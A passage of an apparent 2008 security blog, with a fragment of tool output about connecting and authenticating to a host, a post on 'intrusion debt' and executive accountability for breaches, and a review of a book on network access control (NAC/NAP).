[*] domain (optional):
[*] Connecting to 172.11.12.184...
[*] Authenticating to 172.11.12.184...

If you have no idea what nasl is
http://blog.tenablesecurity.com/2007/06/using-the-nasl-.html

Thanks to MC for bringing this up to me.

Lastly, If I see this shit in some "cutting edge hacker techniques" webcast without a mention of this post I'm gonna go off because this has been out for over two years...I'll leave it at that.
CG

Saturday, November 8, 2008

Intrusion Debt and Security ROI and Security Malpractice


Richard Bejtlich has a new post linked to an older post and mentions the idea of intrusion debt as the counter argument to security ROI. I agree with RB that there is no ROI on security (he has lots of posts arguing this and they are good reads), doing things safely is your ROI, operating your network without compromise and data loss (or minimizing it) is your ROI, protecting your IP is your ROI. From the slides on the new post is the question of what if we allowed people who build bridges to operate at the same standards as those who build networks. Scary, right?

"Imagine that you defer that cost by not detecting and responding to the intrusion. Perhaps the intruder is stealthy. Perhaps you detect the attack but cannot respond for a variety of reasons. The longer the intrusion remains active, I would argue, the more debt one builds."

"How many CEOs/CIOs/CTOs/CISOs/CSOs will look at the digital wreckage of an incident and wonder "why didn't we see this happening?"

The key to that is catching it in the first place and being able to adequately respond or have policies in place once you do see it. In 2008, I didn't think we would still be there, but we are and its sad.

I think business and government entities are lucky about how much they are allowed to shield (lie) to its customers and employees about network compromises. If a network has been owned for several months and the appropriate action wasn't taken (so at some point the compromise was discovered) should that be grounds for fines or lawsuits? You know that any domain will have some type of PII, intellectual property, or something worth protecting floating around. What are people to do with network/security malpractice? Is it feasible to hold those CxO people accountable at that level? What are common people supposed to do when there is gross negligence with their information? Current laws, regulation, and fines obviously aren't working or a sufficient deterrent and I'm not sure asking a technology immature legislative system to come up with more unenforceable laws is a good solution either.

Thoughts on what to do?
CG

Tuesday, November 4, 2008

EFF NSA shirt...I gots mine!


CG

Saturday, November 1, 2008

Implementing NAP and NAC Security Technologies Book Review


Implementing NAP and NAC Security Technologies: The Complete Guide to Network Access Control

Dan Hoffman

4 stars

Witty Title for Amazon: Clear and Actionable Advice on Choosing the Right NAC Solution

Disclaimer:
I was asked to read a pre-release copy of the book, my quote made it onto the book, and I was given a review copy.

I found myself in a position to learn about the different types of NAC appliances as well as Mobile NAC. The problem is that I don't work for a NAC vendor or install NACs for a living. Googling left me with tons of vendor hype on NAC but not a lot of good information to help me understand the different type of NACs, how they work, and why I would would choose one type over the other. Dan Hoffman's book is the only NAC book I know of that is (mostly) vendor neutral. The only other NAC/NAP books I know of are Cisco Press book which obviously tout Cisco products as the best way to go. Dan Hoffman breaks down the functionality of NAC and they different types of NAC solutions into simple easy to understand language, just like he did for Blackjacking on mobile threats. He has a great knack for explaining technical systems and topics in an easy to understand way.

Here is a list of what he covers in the book:

CH1 Understanding Terms and Technologies
CH2 The Technical Components of NAC Solutions
CH3 What Are You Trying to Protect?
CH4 Understanding the Need for LAN-Based NAC/NAP
CH5 Understanding the Need for Mobile NAC
CH6 Understanding Cisco Clean Access
CH7 Understanding Cisco Network Admission Control Framework
CH8 Understanding Fiberlink Mobile NAC
CH9 Understanding Microsoft NAP Solutions
CH10 Understanding NAC and NAP in Other Products

My favorite chapters are CH3 "What Are You Trying to Protect?", CH4 "Understanding the Need for LAN-Based NAC/NAP", and CH5 "Understanding the Need for Mobile NAC."

By far the most important chapter is chapter three where Dan walks through the questions an organization needs to ask itself before it purchases a NAC solution. The company needs to know if they are trying to protect LAN based or Mobile assets and they need to know exactly what they are trying to protect the answer from the first question against. Dan discusses the various scenarios that come about from those two questions and the two follow on chapters provide even more detail on how the two types of solutions (LAN based and Mobile NAC) work and how they differ from one another. Chapter two covers the details of the different parts of NAC and Chapters 6-10 give some of the specifics about different NAC vendor's solutions (not a complete list).

The only thing I didn't like about the book was that it really didn't cover bypassing NAC. It would have been nice to see some content on how NAC is currently being bypassed or what NAC doesn't protect against and how to mitigate against it.



CG